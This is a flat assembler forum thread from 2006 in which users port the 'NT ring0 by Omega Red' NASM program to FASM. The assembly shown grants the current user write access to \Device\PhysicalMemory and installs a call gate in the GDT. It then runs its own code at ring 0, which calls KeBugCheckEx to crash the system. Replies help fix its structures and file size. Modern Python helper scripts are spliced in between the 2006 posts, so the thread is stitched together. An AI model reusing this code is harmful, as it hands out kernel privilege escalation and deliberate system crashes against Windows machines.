flat assembler
Message board for the users of flat assembler.

Help translating/fixing huge nasm code (page 2)
okasvi 05 Mar 2006, 19:02
I noticed that when I'm importing Nt* APIs from ntdll.dll, when debugging it they are Zw*, and when debugging the original nasm version they aren't... so it didn't import them from ntdll.dll, or?

edit:
maybe it has some effect that the nasm version is linked and the linker does import by ordinal?


[attachment: imports_by_ordinal.png]
shism2 05 Mar 2006, 19:41
We have some of the equates or structures wrong... That's the only reason it wouldn't work.
okasvi 05 Mar 2006, 19:55
Went through all pushes and they seem to be identical (when pushing equates).

So a structure, most likely...

I'm guessing this is wrong:
Code:
        EXPLICIT_ACCESS_SIZE equ EXPLICIT_ACCESS_END-EXPLICIT_ACCESS_BEG
        access: 
        times EXPLICIT_ACCESS_SIZE dd 0
        
        EXPLICIT_ACCESS_BEG:
        struct EXPLICIT_ACCESS
                grfAccessPermissions            dd      ?
                grfAccessMode                                           dd      ?
                grfInheritance                                  dd      ?
                Trustee                                                                 dd      ?
        ends
        struct TRUSTEE
                pMultipleTrustee                                        dd      ?
                MultipleTrusteeOperation        dd      ?
                TrusteeForm                                                             dd      ?
                TrusteeType                                                             dd      ?
                ptstrName                                                                       dd      ?
        ends
        EXPLICIT_ACCESS_END:    

okasvi 05 Mar 2006, 20:06
I found the original coder's include files :)

google<3

shism2 05 Mar 2006, 20:16
Where, where? Show me.
okasvi 05 Mar 2006, 20:55
Eh, somewhat obvious :P

google for " "Omega Red" nasm "
1st link -> asm -> inc.zip

Add me to your MSN...

shism2 05 Mar 2006, 22:03
I did, but you don't show up... Btw, I got it working, and the problem was the obj attributes struct.
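The two bugs the thread chases (okasvi's EXPLICIT_ACCESS guess with Trustee as a single dd, and the OBJECT_ATTRIBUTES layout shism2 found wrong) are both size/offset mismatches against the Win32 definitions. A quick way to check a hand-written layout before feeding it to an API is to model it with explicit 32-bit field types and compare sizes and offsets. The following is an added example, not code from the thread or from fasm: the structures are taken from the SDK headers (accctrl.h, winternl.h) in their x86 layout; the names EXPLICIT_ACCESS_GUESS, layout(), field_offset() and sizes() are mine.

```python
import ctypes

# Explicit 32-bit (x86) field types: the assembly in the thread targets x86,
# so pointers and handles are modelled as 4-byte fields regardless of the
# Python interpreter's own pointer width.
DWORD = ctypes.c_uint32
USHORT = ctypes.c_uint16
PTR32 = ctypes.c_uint32   # any pointer or handle inside a 32-bit process


class TRUSTEE_A(ctypes.Structure):          # accctrl.h, x86 layout
    _fields_ = [
        ("pMultipleTrustee", PTR32),
        ("MultipleTrusteeOperation", DWORD),  # enum, 4 bytes
        ("TrusteeForm", DWORD),               # enum
        ("TrusteeType", DWORD),               # enum
        ("ptstrName", PTR32),
    ]


class EXPLICIT_ACCESS_A(ctypes.Structure):  # accctrl.h, x86 layout
    _fields_ = [
        ("grfAccessPermissions", DWORD),
        ("grfAccessMode", DWORD),             # enum ACCESS_MODE
        ("grfInheritance", DWORD),
        ("Trustee", TRUSTEE_A),               # embedded by value, NOT a pointer
    ]


class EXPLICIT_ACCESS_GUESS(ctypes.Structure):
    # okasvi's first attempt from the thread: Trustee declared as one dd.
    # Hypothetical name; included only to make the size difference visible.
    _fields_ = [
        ("grfAccessPermissions", DWORD),
        ("grfAccessMode", DWORD),
        ("grfInheritance", DWORD),
        ("Trustee", PTR32),
    ]


class UNICODE_STRING32(ctypes.Structure):   # what mem_dev_name lays out by hand
    _fields_ = [("Length", USHORT), ("MaximumLength", USHORT), ("Buffer", PTR32)]


class OBJECT_ATTRIBUTES32(ctypes.Structure):  # winternl.h, x86 layout
    _fields_ = [
        ("Length", DWORD),                  # must equal sizeof(OBJECT_ATTRIBUTES)
        ("RootDirectory", PTR32),
        ("ObjectName", PTR32),              # PUNICODE_STRING
        ("Attributes", DWORD),
        ("SecurityDescriptor", PTR32),
        ("SecurityQualityOfService", PTR32),
    ]


def layout(struct_type):
    """Return (field name, byte offset, byte size) for every field, i.e. the
    values a correct fasm `struct` declaration resolves STRUCT.field to."""
    return [(name, getattr(struct_type, name).offset, getattr(struct_type, name).size)
            for name, _ in struct_type._fields_]


def field_offset(path, root):
    """Resolve a dotted path such as 'Trustee.ptstrName' to its byte offset
    from the start of `root`, mirroring EXPLICIT_ACCESS.Trustee+TRUSTEE.ptstrName."""
    offset, current = 0, root
    for part in path.split("."):
        offset += getattr(current, part).offset
        current = dict(current._fields_)[part]   # descend into the field's type
    return offset


def sizes():
    """Byte sizes of the correct layouts next to the thread's wrong guess."""
    return {
        "TRUSTEE": ctypes.sizeof(TRUSTEE_A),
        "EXPLICIT_ACCESS": ctypes.sizeof(EXPLICIT_ACCESS_A),
        "EXPLICIT_ACCESS (Trustee as dd)": ctypes.sizeof(EXPLICIT_ACCESS_GUESS),
        "UNICODE_STRING": ctypes.sizeof(UNICODE_STRING32),
        "OBJECT_ATTRIBUTES": ctypes.sizeof(OBJECT_ATTRIBUTES32),
    }


if __name__ == "__main__":
    for name, size in sizes().items():
        print(f"{name:32s} {size:3d} bytes")
    for name, off, size in layout(EXPLICIT_ACCESS_A):
        print(f"  EXPLICIT_ACCESS.{name:24s} +{off:<3d} ({size} bytes)")
    print("Trustee.ptstrName is at +", field_offset("Trustee.ptstrName", EXPLICIT_ACCESS_A))
```

The sizes are what the assembly has to agree with: TRUSTEE is 20 bytes and EXPLICIT_ACCESS 32, so a Trustee declared as one dd leaves a 16-byte structure and every Trustee sub-field lands outside it; OBJECT_ATTRIBUTES is 24, which is the value its own Length field must carry or the Nt* call rejects it.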
shism2 05 Mar 2006, 22:09
Code:
OBJ_CASE_INSENSITIVE            equ     40h
OBJ_KERNEL_HANDLE               equ 200h
SE_KERNEL_OBJECT                equ     6
DACL_SECURITY_INFORMATION       equ     4
GRANT_ACCESS                    equ     1
NO_INHERITANCE equ 0
NO_MULTIPLE_TRUSTEE equ  0
TRUSTEE_IS_NAME                 equ 1
TRUSTEE_IS_USER                 equ 1 
KGDT_R0_CODE  equ 8
REVOKE_ACCESS equ 800
SYSTEM_MODULE_SIZE equ 284
MAX_MODULE_COUNT equ 1024
SYSTEM_MODULE_INFORMATION_SIZE equ 290820
SystemModuleInformation                                 equ     11
MAXIMUM_FILENAME_LENGTH                                 equ     256
          gdt:
        gdt_limit               rw      1
        gdt_base                  rd    1
        
        farcall:                        rw      3
        txtbuf                  rb      4096
        mem_section             rd      1
        mapped_size             rd      1
        map_base                  rd    1
        p_old_dacl              rd      1
        p_new_dacl              rd      1
        p_sec_descr             rd      1
        sys_info                                SYSTEM_INFO
        ntoskrnl                        rd      1
        align 4
        modinfo                 rb      SYSTEM_MODULE_INFORMATION_SIZE

     m_caption          db              "NT ring0 by Omega Red",0
        f_err                           db              "Error: %s, code: 0x%x",0
        e_opens1                        db              "NtOpenSection for DACL access failed",0
        e_opens2                        db              "NtOpenSection for r/w failed",0
        e_getsec                        db              "GetSecurityInfo failed",0
        e_setacl                        db              "SetEntriesInAclA failed",0
        e_setsec                        db              "SetSecurityInfo failed",0
        e_maps                  db              "NtMapViewOfSection failed",0
        e_unmaps                        db              "NtUnmapViewOfSection failed",0
        e_query                 db              "NtQuerySystemInformation failed",0
        e_ntos                  db              "ntoskrnl.exe module not found in memory!",0
        s_cur_user              db              "CURRENT_USER",0

        align 4
        callgate                        dw              0                                                       ; low part of address
                                                dw              8                                                       ; segment selector: #define KGDT_R0_CODE    8
                                                dw              1110110000000001b               ; misc bits ;P (5 lowest = # of params)
                                                dw              0                                                       ; high part of address

        align 4
        s_mem_dev_uni   du              "\Device\PhysicalMemory"

                                                
        mem_dev_uni_len equ     $-s_mem_dev_uni

        align 4
        mem_dev_name:           ; unicode_string
                                        dw              mem_dev_uni_len
                                        dw              mem_dev_uni_len+2
                                        dd              s_mem_dev_uni

        phys_address    dd      0,0

        align 4
        
          
        access:         
        times   EXPLICIT_ACCESS_SIZE    db      0

     align 4
     
        obj_attr:       dd              OBJECT_ATTRIBUTES_SIZE
                                        dd              0
                                        dd              mem_dev_name
                                        dd              OBJ_CASE_INSENSITIVE OR OBJ_KERNEL_HANDLE
                                        dd              0
                                        dd              0


   

     struct SYSTEM_MODULE
                 Reserved1 rd 1
                Reserved2 rd 1
                ImageBaseAddress  rd 1
                ImageSize rd 1 ; bytes
                Flags rd 1
                Index rw 1 ; zero based
                wRank rw 1 ; 0 if not assigned
                Unknown  rw 1
                ModuleNameOffset rw 1
                ImageName rb MAXIMUM_FILENAME_LENGTH
        ends
     
     ring0start:
     mov                edi, modinfo
        mov             ecx, SYSTEM_MODULE_INFORMATION_SIZE/4
        xor             eax, eax
        rep             stosd

; get allocation granularity (used in memory mapping)
        invoke  GetSystemInfo, sys_info

        ; find NtOsKrnl base
        call            GetNtoskrnl

        ; open handle to the object
        invoke          NtOpenSection, mem_section, WRITE_DAC OR READ_CONTROL, obj_attr
        stdcall NtErrorTest ,e_opens1

        ; get security descriptor
        invoke          GetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, p_old_dacl, 0, p_sec_descr
        stdcall         ErrorTestZ, e_getsec

        ; modify access rights ;]
        mov             dword [access+EXPLICIT_ACCESS.grfAccessPermissions], SECTION_ALL_ACCESS
        mov             dword [access+EXPLICIT_ACCESS.grfAccessMode], GRANT_ACCESS
        mov             dword [access+EXPLICIT_ACCESS.grfInheritance], NO_INHERITANCE
        mov             dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.MultipleTrusteeOperation], NO_MULTIPLE_TRUSTEE
        mov             dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeForm], TRUSTEE_IS_NAME
        mov             dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeType], TRUSTEE_IS_USER
        mov             dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.ptstrName], s_cur_user

        ; create new acl
        invoke          SetEntriesInAcl, 1, access, [p_old_dacl], p_new_dacl
        stdcall         ErrorTestZ, e_setacl

        ; update security descriptor with new acl
        invoke          SetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, [p_new_dacl], 0
        stdcall         ErrorTestZ, e_setsec
        invoke          LocalFree, [p_sec_descr]
        invoke          NtClose, [mem_section]

        ; ok.. now we have writable physical memory ;]
        ; open it in r/w mode
        invoke          NtOpenSection, mem_section, SECTION_MAP_READ OR SECTION_MAP_WRITE, obj_attr
        stdcall         NtErrorTest, e_opens2

        ; setup callgate (proc offset)
        mov             eax, ring0_proc
        mov             [callgate], ax
        shr             eax, 16
        mov             [callgate+6], ax

        ; get gdt
        sgdt            [gdt]
        movzx           ebx, word [gdt_limit]
        mov             eax, [gdt_base]
        call            GetPhysicalAddress
        mov             [phys_address], eax
        stdcall         MapMemory, [gdt_base], ebx, PAGE_READWRITE

        ; install callgate to our ring0 code in gdt - entry #100 (free)
        ; this should *find* some empty descriptor, but i'm too lazy at the moment ;P
        mov             eax, [map_base]
        push            dword [callgate]
        pop             dword [eax+100*8]
        push            dword [callgate+4]
        pop             dword [eax+100*8+4]

        ; ok.. almost there.. prepare far call
        mov             word [farcall+4], 100*8+3       ; our callgate selector

        ; lock the ring0 code to minimize chance that it will be paged out
        ; well, it *can* be paged out, only code in nonpaged kernel pool *can't* be really paged...
        invoke          VirtualLock, ring0_proc, ring0_end-ring0_proc

        ; and.. jump!
        push            dword [ntoskrnl]
        call far [farcall]

        ; cleanup
        invoke          VirtualUnlock, ring0_proc, ring0_end-ring0_proc
        invoke          NtUnmapViewOfSection, -1, [map_base]
        stdcall         NtErrorTest, e_unmaps
        invoke          NtClose, [mem_section]
        ret
;--------------------------------------------------------------------
GetNtoskrnl:
        ; enum modules
        invoke          NtQuerySystemInformation, SystemModuleInformation, modinfo, SYSTEM_MODULE_INFORMATION_SIZE, 0
        stdcall         NtErrorTest, e_query
        mov             ebx, dword [modinfo]            ; count
        mov             esi, modinfo+4          ; 1st module

.1:                                                                     ; loop
        mov             edi, esi
        add             edi, SYSTEM_MODULE.ImageName
        invoke          PathFindFileName, edi
        or                      dword [eax], 20202020h  ; convert to lowercase
        cmp             dword [eax], 'ntos'
        jne             .2
        or                      dword [eax+4], 20202020h
        cmp             dword [eax+4], 'krnl'
        jne             .2
        or                      dword [eax+8], 20202020h
        cmp             dword [eax+8], '.exe'
        jne             .2

        ; ok, seems we have it (although should check for 0 at the end, maybe its `ntoskrnl.exe.blah' ;P)
        mov             eax, dword [esi+SYSTEM_MODULE.ImageBaseAddress] ; base in memory
        mov             [ntoskrnl], eax
        ret

.2:
        add             esi, SYSTEM_MODULE_SIZE
        dec             ebx
        jns             .1

        ; umm.. ntoskrnl not found - quite unlikely to happen ;]
        invoke          MessageBox, 0, e_ntos, 0, 0
        invoke          ExitProcess, 2
;--------------------------------------------------------------------
; substitute for MmGetPhysicalAddress - not always ok, but for this purpose sufficient
; input: linear address in eax
GetPhysicalAddress:
        cmp             eax, 80000000h
        jae             .1
        cmp             eax, 0A0000000h
        jb                      .1
        and             eax, 0FFFF000h
        ret
.1:
        and             eax, 1FFFF000h
        ret
;--------------------------------------------------------------------
; maps memory using \Device\PhysicalMemory

proc            MapMemory,base, size, access_mode
        mov             eax, [base]                     ; address
        xor             edx, edx
        push            eax
        div             dword [sys_info+SYSTEM_INFO.dwAllocationGranularity]    ; edx = offset
        mov             edi, edx
        pop             eax
        mov             ebx, [size]                     ; size
        inc             ebx
        mov             esi, ebx                                ; mapped size
        add             esi, edi
        sub             eax, edi
        call            GetPhysicalAddress
        mov             [phys_address], eax
        mov             [mapped_size], esi
        mov             eax, [mem_section]
        invoke          NtMapViewOfSection, eax, -1, map_base, 0, esi, phys_address, mapped_size, 1, 0, [access_mode]
        add             [map_base], edi
        stdcall         NtErrorTest,e_maps
        ret
endp
;--------------------------------------------------------------------

proc    NtErrorTest, er_msg
        test            eax, eax
        jz                      .ok
        invoke          wsprintf, txtbuf, f_err, [er_msg], eax
        invoke          MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
        invoke          NtClose, [mem_section]
        invoke          ExitProcess, 1
.ok:
ret
endp
;--------------------------------------------------------------------

proc    ErrorTest,e_msg
        test            eax, eax
        jnz             .ok
        call            GetLastError
        invoke          wsprintf, txtbuf, f_err, [e_msg], eax
        invoke          MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
        invoke          NtClose, [mem_section]
        invoke          ExitProcess, 1
.ok:
ret
endp
;--------------------------------------------------------------------

proc    ErrorTestZ ,e1_msg
        test            eax, eax
        jz                      .ok
        invoke          GetLastError
        invoke  wsprintf, txtbuf, f_err, [e1_msg], eax
        invoke          MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
        invoke          NtClose, [mem_section]
        invoke          ExitProcess, 1
.ok:
ret
endp
;--------------------------------------------------------------------
; the real deal ;]
ring0_proc:
        cli
        mov             eax, [esp+8]                    ; param - ntoskrnl base

        push            ebx
        push            edx
        push            esi
        push            edi
; find KeBugCheckEx in exports
        mov             ebx, eax
        add             eax, [eax+0x3c]
        mov             edi, dword [eax+0x78]
        add             edi, ebx
        mov             esi, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfNames]
        add             esi, ebx

        xor             edx, edx
.name:
        mov             eax, [esi]
        add             eax, ebx
        ; check function name
        cmp             dword [eax+00h], "KeBu"
        jne             .F
        cmp             dword [eax+04h], "gChe"
        jne             .F
        cmp             dword [eax+08h], "ckEx"
        jne             .F
        mov             eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfOrdinals]
        add             eax, ebx
        movzx           esi, word [edx*2+eax]
        mov             eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfFunctions]
        add             eax, ebx
        mov             esi, [esi*4+eax]
        add             esi, ebx
        jmp             .fnd
.F:
        add             esi, 4
        inc             edx
        cmp             edx, [edi+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
        jne             .name
.fnd:
        mov             eax, esi

        pop             edi
        pop             esi
        pop             edx
        pop             ebx

;       int3
        stdcall         eax, 0xdeadbeef, 0xdead, 0xbeef, 0xcafe, 0xbabe
        retf 4
ring0_end:    
shism2 06 Mar 2006, 03:24
The only problem now is that the file IS HUGE compared to the original nasm file... And the problem causing that is
Code:
modinfo rb SYSTEM_MODULE_INFORMATION_SIZE
LocoDelAssembly 06 Mar 2006, 04:04
Move it to the end of the source code. In fact, to save even more space, put ALL the uninitialized data together at the end of the source.
okasvi 06 Mar 2006, 04:22
Reorder your sources to be like this:

1st [---equ's---]

2nd [---code---]

3rd
Code:
;--------------------------------------------------------------------
section '.data' data readable writeable
        m_caption               db              "NT ring0 by Omega Red",0
        f_err                           db              "Error: %s, code: 0x%x",0
        e_opens1                db              "NtOpenSection for DACL access failed",0
        e_opens2                db              "NtOpenSection for r/w failed",0
        e_getsec                db              "GetSecurityInfo failed",0
        e_setacl                db              "SetEntriesInAclA failed",0
        e_setsec                db              "SetSecurityInfo failed",0
        e_maps                  db              "NtMapViewOfSection failed",0
        e_unmaps                db              "NtUnmapViewOfSection failed",0
        e_query                 db              "NtQuerySystemInformation failed",0
        e_ntos                  db              "ntoskrnl.exe module not found in memory!",0
        s_cur_user      db              "CURRENT_USER",0

        align 4
        callgate        dw              0                                                       ; low part of address
                                                dw              8                                                       ; segment selector: #define KGDT_R0_CODE    8
                                                dw              1110110000000001b               ; misc bits ;P (5 lowest = # of params)
                                                dw              0                                                       ; high part of address

        align 4
        s_mem_dev_uni   du              "\Device\PhysicalMemory"
        mem_dev_uni_len equ     $-s_mem_dev_uni

        align 4
        mem_dev_name:           ; unicode_string
                                        dw              mem_dev_uni_len
                                        dw              mem_dev_uni_len+2
                                        dd              s_mem_dev_uni

        phys_address    dd      0,0

        align 4
        OBJECT_ATTRIBUTES_SIZE equ 24
  obj_attr: dd          OBJECT_ATTRIBUTES_SIZE 
            dd          0 
            dd          mem_dev_name 
            dd          OBJ_CASE_INSENSITIVE OR OBJ_KERNEL_HANDLE 
            dd          0 
            dd          0 

        align 4
        EXPLICIT_ACCESS_SIZE equ 32
        access: 
        times EXPLICIT_ACCESS_SIZE dd 0
        align 4
        struct TRUSTEE
                pMultipleTrustee rd 1
                MultipleTrusteeOperation rd 1
                TrusteeForm rd 1
                TrusteeType rd 1
                ptstrName rd 1
        ends
        TRUSTEE_SIZE equ 20
        align 4
        struct EXPLICIT_ACCESS
                grfAccessPermissions rd 1
                grfAccessMode rd 1
                grfInheritance rd 1
                Trustee rb TRUSTEE_SIZE
        ends
                
        struct SYSTEM_MODULE_INFORMATION
                dCount rd 1
                m_tam rb SYSTEM_MODULE_SIZE*MAX_MODULE_COUNT ; arbitrary max count - not defined anywhere
        ends

        struct SYSTEM_MODULE
                dReserved01 rd 1
                d04 rd 1
                pAddress rd 1
                dSize rd 1 ; bytes
                dFlags rd 1
                wId rw 1 ; zero based
                wRank rw 1 ; 0 if not assigned
                w18 rw 1
                wNameOffset rw 1
                abName rb MAXIMUM_FILENAME_LENGTH
        ends
        
;--------------------------------------------------------------------
section '.idata' import data readable writeable
library ntdll,'ntdll.dll',\
                                shlwapi,'shlwapi.dll',\
                                kernel32,'kernel32.dll',\
                                user32,'user32.dll',\
                                advapi32,'advapi32.dll'

import shlwapi,\
       PathFindFileName ,'PathFindFileNameA'

import ntdll,\
       NtClose,'NtClose',\
       NtMapViewOfSection,'NtMapViewOfSection',\
       NtOpenSection,'NtOpenSection',\
       NtQuerySystemInformation,'NtQuerySystemInformation',\
       NtUnmapViewOfSection,'NtUnmapViewOfSection'

import kernel32,\
                         GetProcAddress,'GetProcAddress',\
       GetSystemInfo,'GetSystemInfo',\
                         ExitProcess,'ExitProcess',\
       LoadLibrary,'LoadLibraryA',\
                         LocalFree,'LocalFree',\
                         VirtualLock,'VirtualLock',\
                         VirtualUnlock,'VirtualUnlock'

import advapi32,\
                         GetSecurityInfo,'GetSecurityInfo',\
                         SetEntriesInAcl,'SetEntriesInAclA',\
                         SetSecurityInfo,'SetSecurityInfo'

import user32,\
                         MessageBox,'MessageBoxA',\
                         wsprintf,'wsprintfA'

section '.udata' readable writeable

        struct IMAGE_EXPORT_DIRECTORY
                Characteristics           rd  1
                TimeDateStamp             rd  1
                MajorVersion              rw  1
                MinorVersion              rw  1
                nName                     rd  1
                nBase                     rd  1
                NumberOfFunctions         rd  1
                NumberOfNames             rd  1
                AddressOfFunctions        rd  1
                AddressOfNames            rd  1
                AddressOfNameOrdinals     rd  1
        ends
        
        gdt:
        gdt_limit               rw      1
        gdt_base                rd      1
        farcall:                rw      3
        txtbuf                  rb      4096
        mem_section     rd      1
        mapped_size     rd      1
        map_base                rd      1
        p_old_dacl      rd      1
        p_new_dacl      rd      1
        p_sec_descr     rd      1
        sys_info                SYSTEM_INFO
        ntoskrnl                rd      1
        align 4
        modinfo                 rb      SYSTEM_MODULE_INFORMATION_SIZE    

madmatt 06 Mar 2006, 06:46
You need to put your large data into a ".bss" section.
LocoDelAssembly 06 Mar 2006, 13:52
Well, if you put the data in a separate section, then you don't need to put the uninitialized data at the end of the source but at the end of the section, and the section can be placed anywhere.
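The advice in the last few posts rests on one PE fact: a section costs SizeOfRawData bytes in the file but VirtualSize bytes in memory, and fasm leaves trailing uninitialized data (`rb`/`rd` at the end of a section) out of the raw data, whereas an `rb` block followed by initialized data has to be written out as zeros. The quickest way to confirm where the bloat went is to read the section table. The following is an added example, not code from the thread or from fasm: a small PE section-table reader run over a constructed two-section image, one section with 0x200 raw bytes and one uninitialized section whose VirtualSize is the thread's SYSTEM_MODULE_INFORMATION_SIZE (290820) but whose SizeOfRawData is 0. The builder and the names build_sample_pe, pe_sections and size_report are mine; the header offsets are the standard PE32 ones.

```python
import struct

SECTION_HDR = "<8sIIIIIIHHI"          # IMAGE_SECTION_HEADER, 40 bytes
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
FILE_ALIGNMENT = 0x200
MODINFO_SIZE = 290820                 # SYSTEM_MODULE_INFORMATION_SIZE from the thread


def _section_header(name, vsize, vaddr, rawsize, rawptr, flags):
    return struct.pack(SECTION_HDR, name.encode().ljust(8, b"\0"),
                       vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, flags)


def build_sample_pe():
    """Constructed sample image (headers only, no code): '.data' with 0x200
    raw bytes, '.udata' reserved in memory but absent from the file."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)            # e_lfanew: PE header follows the DOS header
    opt = bytearray(224)                              # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)             # Magic = PE32
    struct.pack_into("<I", opt, 32, 0x1000)           # SectionAlignment
    struct.pack_into("<I", opt, 36, FILE_ALIGNMENT)   # FileAlignment
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x0102)
    sections = (
        _section_header(".data", 0x1A0, 0x1000, 0x200, 0x400, 0xC0000040) +
        _section_header(".udata", MODINFO_SIZE, 0x2000, 0, 0, 0xC0000080)
    )
    image = dos + b"PE\0\0" + file_hdr + opt + sections
    image += b"\0" * (0x400 - len(image))             # pad up to .data's PointerToRawData
    image += b"\0" * 0x200                            # .data raw bytes
    return bytes(image)


def pe_sections(data):
    """Parse the section table of a PE image held in memory."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    n_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size                  # section table follows the optional header
    result = []
    for i in range(n_sections):
        off = table + 40 * i
        if off + 40 > len(data):
            raise ValueError("truncated section table")
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, flags = \
            struct.unpack_from(SECTION_HDR, data, off)
        result.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize,
            "virtual_address": vaddr,
            "raw_size": rawsize,
            "raw_ptr": rawptr,
            "uninitialized": bool(flags & IMAGE_SCN_CNT_UNINITIALIZED_DATA),
        })
    return result


def size_report(sections):
    """(bytes the sections occupy on disk, bytes they occupy once mapped)."""
    return (sum(s["raw_size"] for s in sections),
            sum(s["virtual_size"] for s in sections))


if __name__ == "__main__":
    secs = pe_sections(build_sample_pe())
    for s in secs:
        print(f"{s['name']:8s} raw={s['raw_size']:#8x} virtual={s['virtual_size']:#8x}"
              f" {'(uninitialized)' if s['uninitialized'] else ''}")
    print("on disk / in memory:", size_report(secs))
```

Pointed at a real executable with `pe_sections(open(path, "rb").read())`, the reader shows at once whether a reserved buffer is costing file space: a correctly placed `modinfo rb ...` appears as VirtualSize with no matching raw bytes, while one that fasm had to materialize shows up as SizeOfRawData roughly equal to its VirtualSize.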
shism2 06 Mar 2006, 19:26
Still got the problem

Code:
OBJ_CASE_INSENSITIVE            equ     40h
OBJ_KERNEL_HANDLE               equ 200h
SE_KERNEL_OBJECT                equ     6
DACL_SECURITY_INFORMATION       equ     4
GRANT_ACCESS                    equ     1
NO_INHERITANCE equ 0
NO_MULTIPLE_TRUSTEE equ  0
TRUSTEE_IS_NAME                 equ 1
TRUSTEE_IS_USER                 equ 1 
KGDT_R0_CODE  equ 8
REVOKE_ACCESS equ 800
SYSTEM_MODULE_SIZE equ 284
MAX_MODULE_COUNT equ 1024
SYSTEM_MODULE_INFORMATION_SIZE equ 290820
SystemModuleInformation                                 equ     11
MAXIMUM_FILENAME_LENGTH                                 equ     256

       
     ring0start:
     mov                edi, modinfo
        mov             ecx, SYSTEM_MODULE_INFORMATION_SIZE/4
        xor             eax, eax
        rep             stosd

; get allocation granularity (used in memory mapping)
        invoke  GetSystemInfo, sys_info

        ; find NtOsKrnl base
        call            GetNtoskrnl

        ; open handle to the object
        invoke          NtOpenSection, mem_section, WRITE_DAC OR READ_CONTROL, obj_attr
        stdcall NtErrorTest ,e_opens1

        ; get security descriptor
        invoke          GetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, p_old_dacl, 0, p_sec_descr
        stdcall         ErrorTestZ, e_getsec

        ; modify access rights ;]
        mov             dword [access+EXPLICIT_ACCESS.grfAccessPermissions], SECTION_ALL_ACCESS
        mov             dword [access+EXPLICIT_ACCESS.grfAccessMode], GRANT_ACCESS
        mov             dword [access+EXPLICIT_ACCESS.grfInheritance], NO_INHERITANCE
        mov             dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.MultipleTrusteeOperation], NO_MULTIPLE_TRUSTEE
        mov             dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeForm], TRUSTEE_IS_NAME
        mov             dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeType], TRUSTEE_IS_USER
        mov             dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.ptstrName], s_cur_user

        ; create new acl
        invoke          SetEntriesInAcl, 1, access, [p_old_dacl], p_new_dacl
        stdcall         ErrorTestZ, e_setacl

        ; update security descriptor with new acl
        invoke          SetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, [p_new_dacl], 0
        stdcall         ErrorTestZ, e_setsec
        invoke          LocalFree, [p_sec_descr]
        invoke          NtClose, [mem_section]

        ; ok.. now we have writable physical memory ;]
        ; open it in r/w mode
        invoke          NtOpenSection, mem_section, SECTION_MAP_READ OR SECTION_MAP_WRITE, obj_attr
        stdcall         NtErrorTest, e_opens2

        ; setup callgate (proc offset)
        mov             eax, ring0_proc
        mov             [callgate], ax
        shr             eax, 16
        mov             [callgate+6], ax

        ; get gdt
        sgdt            [gdt]
        movzx           ebx, word [gdt_limit]
        mov             eax, [gdt_base]
        call            GetPhysicalAddress
        mov             [phys_address], eax
        stdcall         MapMemory, [gdt_base], ebx, PAGE_READWRITE

        ; install callgate to our ring0 code in gdt - entry #100 (free)
        ; this should *find* some empty descriptor, but i'm too lazy at the moment ;P
        mov             eax, [map_base]
        push            dword [callgate]
        pop             dword [eax+100*8]
        push            dword [callgate+4]
        pop             dword [eax+100*8+4]

        ; ok.. almost there.. prepare far call
        mov             word [farcall+4], 100*8+3       ; our callgate selector

        ; lock the ring0 code to minimize chance that it will be paged out
        ; well, it *can* be paged out, only code in nonpaged kernel pool *can't* be really paged...
        invoke          VirtualLock, ring0_proc, ring0_end-ring0_proc

        ; and.. jump!
        push            dword [ntoskrnl]
        call far [farcall]

        ; cleanup
        invoke          VirtualUnlock, ring0_proc, ring0_end-ring0_proc
        invoke          NtUnmapViewOfSection, -1, [map_base]
        stdcall         NtErrorTest, e_unmaps
        invoke          NtClose, [mem_section]
        ret
;--------------------------------------------------------------------
GetNtoskrnl:
        ; enum modules
        invoke          NtQuerySystemInformation, SystemModuleInformation, modinfo, SYSTEM_MODULE_INFORMATION_SIZE, 0
        stdcall         NtErrorTest, e_query
        mov             ebx, dword [modinfo]            ; count
        mov             esi, modinfo+4          ; 1st module

.1:                                                                     ; loop
        mov             edi, esi
        add             edi, SYSTEM_MODULE.ImageName
        invoke          PathFindFileName, edi
        or                      dword [eax], 20202020h  ; convert to lowercase
        cmp             dword [eax], 'ntos'
        jne             .2
        or                      dword [eax+4], 20202020h
        cmp             dword [eax+4], 'krnl'
        jne             .2
        or                      dword [eax+8], 20202020h
        cmp             dword [eax+8], '.exe'
        jne             .2

        ; ok, seems we have it (although should check for 0 at the end, maybe its `ntoskrnl.exe.blah' ;P)
        mov             eax, dword [esi+SYSTEM_MODULE.ImageBaseAddress] ; base in memory
        mov             [ntoskrnl], eax
        ret

.2:
